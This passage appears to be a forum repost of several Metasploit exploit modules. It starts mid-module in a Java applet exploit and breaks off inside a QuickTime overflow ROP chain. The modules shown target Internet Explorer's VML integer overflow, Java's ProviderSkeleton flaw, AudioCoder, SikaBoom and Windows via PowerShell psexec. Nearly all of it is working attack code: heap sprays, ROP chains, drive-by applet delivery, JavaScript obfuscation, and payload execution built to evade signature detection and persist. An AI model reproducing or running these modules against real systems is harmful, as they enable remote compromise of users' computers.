    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "FakeDriver.class")
    @driver_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "FakeDriver2.class")
    @driver2_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "META-INF", "services", "java.lang.Object")
    @object_services = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "META-INF", "services", "java.sql.Driver")
    @driver_services = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
 
    @exploit_class_name = rand_text_alpha("Exploit".length)
    @exploit_class.gsub!("Exploit", @exploit_class_name)
 
    @jnlp_name = rand_text_alpha(8)
 
    super
  end
 
  def jnlp_file
    jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"
 
    jnlp = %Q|
<?xml version="1.0" encoding="utf-8"?>
<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{jnlp_uri}">
  <information>
    <title>Applet Test JNLP</title>
    <vendor>#{rand_text_alpha(8)}</vendor>
    <description>#{rand_text_alpha(8)}</description>
    <offline-allowed/>
  </information>
 
  <resources>
    <j2se version="1.7+" href="http://java.sun.com/products/autodl/j2se" />
    <jar href="#{rand_text_alpha(8)}.jar" main="true" />
  </resources>
  <applet-desc name="#{rand_text_alpha(8)}" main-class="#{@exploit_class_name}" width="1" height="1">
    <param name="__applet_ssv_validated" value="true"></param>
  </applet-desc>
  <update check="background"/>
</jnlp>
    |
    return jnlp
  end
 
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")
 
    case request.uri
    when /\.jnlp$/i
      send_response(cli, jnlp_file, { 'Content-Type' => "application/x-java-jnlp-file" })
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)
      jar.add_file("FakeDriver.class", @driver_class)
      jar.add_file("FakeDriver2.class", @driver2_class)
      jar.add_file("META-INF/services/java.lang.Object", @object_services)
      jar.add_file("META-INF/services/java.sql.Driver", @driver_services)
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest
 
      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
 
  end
 
  def generate_html
    jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"
 
    # When the browser is IE, the ActvX is used in order to load the malicious JNLP, allowing click2play bypass
    # Else an <applet> tag is used to load the malicious applet, this time there isn't click2play bypass
    html = %Q|
    <html>
    <body>
    <object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0>
    <param name="app" value="#{jnlp_uri}">
    <param name="back" value="true">
    <applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
    </object>
    </body>
    </html>
    |
    return html
  end
 
end

 

[DarckSol]

MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb
  include Msf::Exploit::Remote::BrowserAutopwn
 
  autopwn_info({
    :ua_name    => HttpClients::IE,
    :ua_minver  => "8.0",
    :ua_maxver  => "8.0",
    :javascript => true,
    :os_name    => OperatingSystems::WINDOWS,
    :rank       => Rank
  })
 
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow",
      'Description'    => %q{
          This module exploits an integer overflow vulnerability on Internet Explorer.
        The vulnerability exists in the handling of the dashstyle.array length for vml
        shapes on the vgx.dll module. This module has been tested successfully on Windows 7
        SP1 with IE8. It uses the the JRE6 to bypass ASLR by default. In addition a target
        to use an info leak to disclose the ntdll.dll base address is provided. This target
        requires ntdll.dll v6.1.7601.17514 (the default dll version on a fresh Windows 7 SP1
        installation) or ntdll.dll v6.1.7601.17725 (version installed after apply MS12-001).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Nicolas Joly', # Vulnerability discovery, PoC and analysis
          '4B5F5F4B', # PoC
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-2551' ],
          [ 'OSVDB', '91197' ],
          [ 'BID', '58570' ],
          [ 'MSB', 'MS13-037' ],
          [ 'URL', 'http://www.vupen.com/blog/20130522.Advanced_Exploitation_of_IE10_Windows8_Pwn2Own_2013.php' ],
          [ 'URL', 'http://binvul.com/viewthread.php?tid=311' ]
        ],
      'Payload'        =>
        {
          'Space'          => 948,
          'DisableNops'    => true,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'IE 8 on Windows 7 SP1 with JRE ROP', # default
            {
              'Rop' => :jre,
              'Offset' => '0x5f4'
            }
          ],
          # requires:
          # * ntdll.dll v6.1.7601.17514 (fresh W7SP1 installation)
          # * ntdll.dll v6.1.7601.17725 (MS12-001)
          [ 'IE 8 on Windows 7 SP1 with ntdll.dll Info Leak',
            {
              'Rop' => :ntdll,
              'Offset' => '0x5f4'
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Mar 06 2013",
      'DefaultTarget'  => 0))
 
    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
      ], self.class)
 
  end
 
  def exploit
    @second_stage_url = rand_text_alpha(10)
    @leak_param = rand_text_alpha(5)
    super
  end
 
  def get_target(agent)
    #If the user is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'
 
    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
 
    ie_name = "IE #{ie}"
 
    case nt
    when '5.1'
      os_name = 'Windows XP SP3'
    when '6.0'
      os_name = 'Windows Vista'
    when '6.1'
      os_name = 'Windows 7'
    end
 
    targets.each do |t|
      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
        print_status("Target selected as: #{t.name}")
        return t
      end
    end
 
    return nil
  end
 
  def ie_heap_spray(my_target, p)
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
 
    # Land the payload at 0x0c0c0c0c
    # For IE 8
    js = %Q|
    var heap_obj = new heapLib.ie(0x20000);
    var code = unescape("#{js_code}");
    var nops = unescape("#{js_nops}");
    while (nops.length < 0x80000) nops += nops;
    var offset = nops.substring(0, #{my_target['Offset']});
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
    while (shellcode.length < 0x40000) shellcode += shellcode;
    var block = shellcode.substring(0, (0x80000-6)/2);
    heap_obj.gc();
    for (var i=1; i < 0x300; i++) {
      heap_obj.alloc(block);
    }
    |
 
    js = heaplib(js, {:noobfu => true})
 
    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate
    end
 
    return js
  end
 
  def get_ntdll_rop
    case @ntdll_version
    when "6.1.7601.17514"
      stack_pivot = [
        @ntdll_base+0x0001578a, # ret # from ntdll
        @ntdll_base+0x000096c9, # pop ebx # ret # from ntdll
        @ntdll_base+0x00015789, # xchg eax, esp # ret from ntdll
      ].pack("V*")
      ntdll_rop = [
        @ntdll_base+0x45F18, # ntdll!ZwProtectVirtualMemory
        0x0c0c0c40, # ret to shellcode
        0xffffffff, # ProcessHandle
        0x0c0c0c34, # ptr to BaseAddress
        0x0c0c0c38, # ptr to NumberOfBytesToProtect
        0x00000040, # NewAccessProtection
        0x0c0c0c3c, # ptr to OldAccessProtection
        0x0c0c0c40, # BaseAddress
        0x00000400, # NumberOfBytesToProtect
        0x41414141  # OldAccessProtection
      ].pack("V*")
      return stack_pivot + ntdll_rop
    when "6.1.7601.17725"
      stack_pivot = [
        @ntdll_base+0x0001579a, # ret # from ntdll
        @ntdll_base+0x000096c9, # pop ebx # ret # from ntdll
        @ntdll_base+0x00015799, # xchg eax, esp # ret from ntdll
      ].pack("V*")
      ntdll_rop = [
        @ntdll_base+0x45F18, # ntdll!ZwProtectVirtualMemory
        0x0c0c0c40, # ret to shellcode
        0xffffffff, # ProcessHandle
        0x0c0c0c34, # ptr to BaseAddress
        0x0c0c0c38, # ptr to NumberOfBytesToProtect
        0x00000040, # NewAccessProtection
        0x0c0c0c3c, # ptr to OldAccessProtection
        0x0c0c0c40, # BaseAddress
        0x00000400, # NumberOfBytesToProtect
        0x41414141  # OldAccessProtection
      ].pack("V*")
      return stack_pivot + ntdll_rop
    else
      return ""
    end
  end
 
  def get_payload(t, cli)
    code = payload.encoded
    # No rop. Just return the payload.
    return code if t['Rop'].nil?
 
    # Both ROP chains generated by mona.py - See corelan.be
    case t['Rop']
    when :jre
      print_status("Using JRE ROP")
      stack_pivot = [
        0x7c348b06, # ret # from msvcr71
        0x7c341748, # pop ebx # ret # from msvcr71
        0x7c348b05  # xchg eax, esp # ret from msvcr71
      ].pack("V*")
      rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
    when :ntdll
      print_status("Using ntdll ROP")
      rop_payload = get_ntdll_rop + payload.encoded
    end
 
    return rop_payload
  end
 
  def load_exploit_html(my_target, cli)
    p  = get_payload(my_target, cli)
    js = ie_heap_spray(my_target, p)
 
    js_trigger = %Q|
var rect_array = new Array()
var a = new Array()
 
function createRects(){
  for(var i=0; i<0x1000; i++){
    rect_array[i]    = document.createElement("v:shape")
    rect_array[i].id = "rect" + i.toString()
    document.body.appendChild(rect_array[i])
  }
}
 
function exploit(){
 
  var vml1 = document.getElementById("vml1")
 
  for (var i=0; i<0x1000; i++){
    a[i] = document.getElementById("rect" + i.toString())._anchorRect;
    if (i == 0x800) {
      vml1.dashstyle = "1 2 3 4"
    }
  }
 
  vml1.dashstyle.array.length = 0 - 1;
  vml1.dashstyle.array.item(6) = 0x0c0c0c0c;
 
  for (var i=0; i<0x1000; i++)
  {
    delete a[i];
    CollectGarbage();
  }
  location.reload();
 
}
    |
 
    create_rects_func = "createRects"
    exploit_func = "exploit"
 
    if datastore['OBFUSCATE']
      js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger)
      js_trigger.obfuscate
      create_rects_func = js_trigger.sym("createRects")
      exploit_func = js_trigger.sym("exploit")
    end
 
    html = %Q|
<html>
<head>
<script>
#{js}
</script>
<meta http-equiv="x-ua-compatible" content="IE=EmulateIE9" >
</head>
<title>
</title>
<style>v\\: * { behavior:url(#default#VML); display:inline-block }</style>
<xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" />
<script>
#{js_trigger}
</script>
<body onload="#{create_rects_func}(); #{exploit_func}();">
<v:oval>
<v:stroke id="vml1"/>
</v:oval>
</body>
</html>
    |
 
    return html
  end
 
  def html_info_leak
 
    js_trigger = %Q|
var rect_array = new Array()
var a = new Array()
 
function createRects(){
  for(var i=0; i<0x400; i++){
    rect_array[i]    = document.createElement("v:shape")
    rect_array[i].id = "rect" + i.toString()
    document.body.appendChild(rect_array[i])
  }
}
 
function exploit(){
 
  var vml1  = document.getElementById("vml1")
 
  for (var i=0; i<0x400; i++){
    a[i] = document.getElementById("rect" + i.toString())._vgRuntimeStyle;
  }
 
  for (var i=0; i<0x400; i++){
    a[i].rotation;
    if (i == 0x300) {
      vml1.dashstyle = "1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44"
    }
  }
 
  var length_orig = vml1.dashstyle.array.length;
  vml1.dashstyle.array.length = 0 - 1;
 
  for (var i=0; i<0x400; i++)
  {
    a[i].marginLeft = "a";
    marginLeftAddress = vml1.dashstyle.array.item(0x2E+0x16);
    if (marginLeftAddress > 0) {
      vml1.dashstyle.array.item(0x2E+0x16) = 0x7ffe0300;
      var leak = a[i].marginLeft;
      vml1.dashstyle.array.item(0x2E+0x16) = marginLeftAddress;
      vml1.dashstyle.array.length = length_orig;
      document.location = "#{get_resource}/#{@second_stage_url}" + "?#{@leak_param}=" + parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 )
      return;
    }
  }
 
}
    |
 
    create_rects_func = "createRects"
    exploit_func = "exploit"
 
    if datastore['OBFUSCATE']
      js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger)
      js_trigger.obfuscate
      create_rects_func = js_trigger.sym("createRects")
      exploit_func = js_trigger.sym("exploit")
    end
 
    html = %Q|
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=EmulateIE9" >
</head>
<title>
</title>
<style>v\\: * { behavior:url(#default#VML); display:inline-block }</style>
<xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" />
<script>
#{js_trigger}
</script>
<body onload="#{create_rects_func}(); #{exploit_func}();">
<v:oval>
<v:stroke id="vml1"/>
</v:oval>
</body>
</html>
    |
 
    return html
 
  end
 
  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    uri   = request.uri
    print_status("Requesting: #{uri}")
 
    my_target = get_target(agent)
    # Avoid the attack if no suitable target found
    if my_target.nil?
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end
 
    if my_target['Rop'] == :ntdll and request.uri !~ /#{@second_stage_url}/
      html = html_info_leak
      html = html.gsub(/^\t\t/, '')
      print_status("Sending HTML to info leak...")
      send_response(cli, html, {'Content-Type'=>'text/html'})
    else
      leak = begin
        request.uri_parts["QueryString"][@leak_param].to_i
      rescue
        0
      end
 
      if leak == 0
        html = load_exploit_html(my_target, cli)
        html = html.gsub(/^\t\t/, '')
        print_status("Sending HTML to trigger...")
        send_response(cli, html, {'Content-Type'=>'text/html'})
        return
      end
 
      vprint_status("ntdll leak: 0x#{leak.to_s(16)}")
      fingerprint = leak & 0x0000ffff
 
      case fingerprint
      when 0x70B0
        @ntdll_version = "6.1.7601.17514"
        @ntdll_base = leak - 0x470B0
      when 0x7090
        @ntdll_version = "6.1.7601.17725" # MS12-001
        @ntdll_base = leak - 0x47090
      else
        print_error("ntdll version not detected, sending 404: #{agent}")
        send_not_found(cli)
        return
      end
 
      html = load_exploit_html(my_target, cli)
      html = html.gsub(/^\t\t/, '')
      print_status("Sending HTML to trigger...")
      send_response(cli, html, {'Content-Type'=>'text/html'})
 
    end
 
  end
 
end

 

[DarckSol]

Java Applet ProviderSkeleton Insecure Invoke Method Exploit

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
  
require 'msf/core'
require 'rex'
  
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default
  
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })
  
  EXPLOIT_STRING = "Exploit"
  
  def initialize( info = {} )
  
    super( update_info( info,
      'Name'          => 'Java Applet ProviderSkeleton Insecure Invoke Method',
      'Description'   => %q{
          This module abuses the insecure invoke() method of the ProviderSkeleton class that
        allows to call arbitrary static methods with user supplied arguments. The vulnerability
        affects Java version 7u21 and earlier.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Adam Gowdiak', # Vulnerability discovery according to Oracle's advisory and also POC
          'Matthias Kaiser' # Metasploit module
        ],
      'References'    =>
        [
          [ 'CVE', '2013-2460' ],
          [ 'OSVDB', '94346' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html'],
          [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/160cde99bb1a' ],
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf' ],
          [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-61.zip' ]
        ],
      'Platform'      => [ 'java', 'win', 'osx', 'linux' ],
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'       =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 18 2013'
    ))
  end
  
  def randomize_identifier_in_jar(jar, identifier)
    identifier_str = rand_text_alpha(identifier.length)
    jar.entries.each { |entry|
      entry.name.gsub!(identifier, identifier_str)
      entry.data = entry.data.gsub(identifier, identifier_str)
    }
  end
  
  
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "Exploit.class")
    @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "ExpProvider.class")
    @provider_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "DisableSecurityManagerAction.class")
    @action_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
  
    @exploit_class_name = rand_text_alpha(EXPLOIT_STRING.length)
    @exploit_class.gsub!(EXPLOIT_STRING, @exploit_class_name)
  
    super
  end
  
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")
  
    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)
      jar.add_file("ExpProvider.class", @provider_class)
      jar.add_file("DisableSecurityManagerAction.class", @action_class)
      randomize_identifier_in_jar(jar, "metasploit")
      randomize_identifier_in_jar(jar, "payload")
      jar.build_manifest
  
      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  
  end
  
  def generate_html
    html = %Q|
    <html>
    <body>
    <applet archive="#{rand_text_alpha(rand(5) + 3)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
    </body>
    </html>
    |
    return html
  end
  
end

Добавлено в [time]1372748136[/time]
AudioCoder (.lst) - Buffer Overflow (msf)

require 'msf/core'
   
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
   
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh
   
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'AudioCoder .lst Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in Audio Code 0.8.18. The vulnerability
        occurs when adding an .lst, allowing arbitrary code execution with the privileges
        of the user running AudioCoder. This module has been tested successfully on
        AudioCoder 0.8.22 over Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'onying', # Vulnerability discovery and PoC
          'Asesino04' # Metasploit module
        ],
      'References'     =>
        [
          [ 'OSVDB', 'N/A' ],
          [ 'EDB', '26448' ]
        ],
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'process'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'Space'           => 6596,
          'BadChars'        => "\x00\x5c\x40\x0d\x0a",
          'DisableNops'     => true,
          'StackAdjustment' => -3500,
        },
      'Targets'        =>
        [
          [ 'AudioCoder 0.8.22 / Windows XP SP3 / Windows 7 SP1',
            {
              'Ret'     => 0x66011b56, # libiconv-2.dll
              'Offset'  => 765
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'juin 01 2013',
      'DefaultTarget'  => 0))
   
    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.lst']),
      ], self.class)
   
  end
   
  def exploit
    buffer = "http://"
    buffer << rand_text(target['Offset'])
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded
   
    file_create(buffer)
  end
end

 

[DarckSol]

SikaBoom Remote Buffer overflow exploit

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
 
      include Msf::Exploit::Remote::Tcp
 
      def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'SikaBoom Remote Buffer overflow',
                        'Description'    => %q{
                                        This module exploits a buffer overflow in SikaBoom .
                                             },
                        'Module'         => [ 'Asesino04' ],
      'References'     =>
        [
          [ 'Bug', 'http://1337day.com/exploit/16672' ],
 
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                },
                        'Payload'        =>
                                {
                                        'Space'    => 268,
                                        'BadChars' => "\x00\xff",
                                },
                        'Platform'       => 'win',
 
                        'Targets'        =>
                                [
                                        ['Windows XP SP2 En',
                                          { 'Ret' => 0x5D38827C, 'Offset' => 268 } ],
                                ],
                        'DefaultTarget' => 0,
 
                        'Privileged'     => false
                        ))
 
                        register_options(
                        [
                                Opt::RPORT(4321)
                        ], self.class)
       end
 
       def exploit
          connect
 
          junk = make_nops(target['Offset'])
          sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded
          sock.put(sploit)
 
          handler
          disconnect
 
       end
 
end

 

[DarckSol]

Microsoft Windows Authenticated Powershell Command Execution

# -*- coding: binary -*-
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
require 'msf/core/exploit/powershell'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking
 
  # Exploit mixins should be called first
  include Msf::Exploit::Remote::SMB::Psexec
  include Msf::Exploit::Powershell
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Windows Authenticated Powershell Command Execution',
      'Description'    => %q{
          This module uses a valid administrator username and password to execute a powershell
        payload using a similar technique to the "psexec" utility provided by SysInternals. The
        payload is encoded in base64 and executed from the commandline using the -encodedcommand
        flag. Using this method, the payload is never written to disk, and given that each payload
        is unique, is less prone to signature based detection. Since executing shellcode in .NET
        requires the use of system resources from unmanaged memory space, the .NET (PSH) architecture
        must match that of the payload. Lastly, a persist option is provided to execute the payload
        in a while loop in order to maintain a form of persistence. In the event of a sandbox
        observing PSH execution, a delay and other obfuscation may be added to avoid detection.
        In order to avoid interactive process notifications for the current user, the psh payload has
        been reduced in size and wrapped in a powershell invocation which SPOILERs the process entirely.
      },
 
      'Author'         => [
        'Royce @R3dy__ Davis <rdavis[at]accuvant.com>', # PSExec command module
        'RageLtMan <rageltman[at]sempervictus' # PSH exploit, libs, encoders
      ],
 
      'License'        => MSF_LICENSE,
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'WfsDelay'     => 10,
          'EXITFUNC' => 'thread'
        },
      'Payload'        =>
        {
          'Space'        => 8192,
          'DisableNops'  => true,
          'StackAdjustment' => -3500
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 01 1999',
      'References'     => [
        [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
        [ 'OSVDB', '3106'],
        [ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ],
        [ 'URL', 'http://sourceforge.net/projects/smbexec/' ],
        [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
      ]
    ))
  end
 
  def exploit
    command = cmd_psh_payload(payload.encoded)
 
    if datastore['PERSIST'] and not datastore['DisablePayloadHandler']
      print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PERSIST option.")
    end
 
    if datastore['RUN_WOW64'] and target_arch.first == "x86_64"
      fail_with(Exploit::Failure::BadConfig, "Select an x86 target and payload with RUN_WOW64 enabled")
    end
 
    # Try and authenticate with given credentials
    if connect
      begin
        smb_login
      rescue StandardError => autherror
        disconnect
        fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}")
      end
      # Execute the powershell command
      print_status("#{peer} - Executing the payload...")
      begin
        return psexec(command)
      rescue StandardError => exec_command_error
        disconnect
        fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
      end
    end
  end
 
  def peer
    return "#{rhost}:#{rport}"
  end
end
 
# E72C911DC2F9CA10   1337day.com [2013-07-14]   AF0F37A1401E9E77 #

 

[DarckSol]

Apple Quicktime 7 Invalid Atom Length Buffer Overflow Vulnerability

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit4 < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::Remote::HttpServer::HTML
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow",
      'Description'    => %q{
        This module exploits a vulnerability found in Apple Quicktime. The flaw is
        triggered when Quicktime fails to properly handle the data length for certain
        atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer
        overflow by loading a specially crafted .mov file, and allows arbitrary
        code execution under the context of the user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Jason Kratzer', # Original Discovery & PoC (overlapped finding), aka pyoor
          'Tom Gallagher', # Original Discovery (overlapped)
          'Paul Bates',    # Original Discovery (overlapped)
          'sinn3r'         # Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1017' ],
          [ 'BID', '60097' ],
          [ 'URL', 'http://support.apple.com/kb/HT5770' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          # All of the following addresses are from Quicktime.qts
          # RET = ADD ESP,280; RET, Nop = RET, Pop = POP ESP; RET
          [ 'Quicktime 7.7.3 with IE 8 on Windows XP SP3', {'Ret' => 0x66923467, 'Nop' => 0x6692346d, 'Pop' => 0x66849239} ],
          [ 'Quicktime 7.7.2 with IE 8 on Windows XP SP3', {'Ret' => 0x669211C7, 'Nop' => 0x669211CD, 'Pop' => 0x668C5B55} ],
          [ 'Quicktime 7.7.1 with IE 8 on Windows XP SP3', {'Ret' => 0x66920D67, 'Nop' => 0x66920D6D, 'Pop' => 0x66849259} ],
          [ 'Quicktime 7.7.0 with IE 8 on Windows XP SP3', {'Ret' => 0x66920BD7, 'Nop' => 0x66920BDD, 'Pop' => 0x668E963A} ]
        ],
      'Payload'        =>
        {
          'BadChars'        => "\x00"  # js_property_spray no like nilz
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Privileged'     => false,
      'DisclosureDate' => "May 22 2013"
    ))
  end
 
  def get_payload(t)
    p    = ''
 
    rop =
    [
      0x77c1e844, # POP EBP # RETN [msvcrt.dll]
      0x77c1e844, # skip 4 bytes [msvcrt.dll]
      0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
      0xffffffff,
      0x77c127e5, # INC EBX # RETN [msvcrt.dll]
      0x77c127e5, # INC EBX # RETN [msvcrt.dll]
      0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
      0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
      0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
      0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
      0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
      0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
      0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
      0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
      0x77c3048a, # POP EDI # RETN [msvcrt.dll]
      0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
      0x77c46efb, # POP ESI # RETN [msvcrt.dll]
      0x77c2aacc, # JMP [EAX] [msvcrt.dll]
      0x77c3b860, # POP EAX # RETN [msvcrt.dll]
      0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
      0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
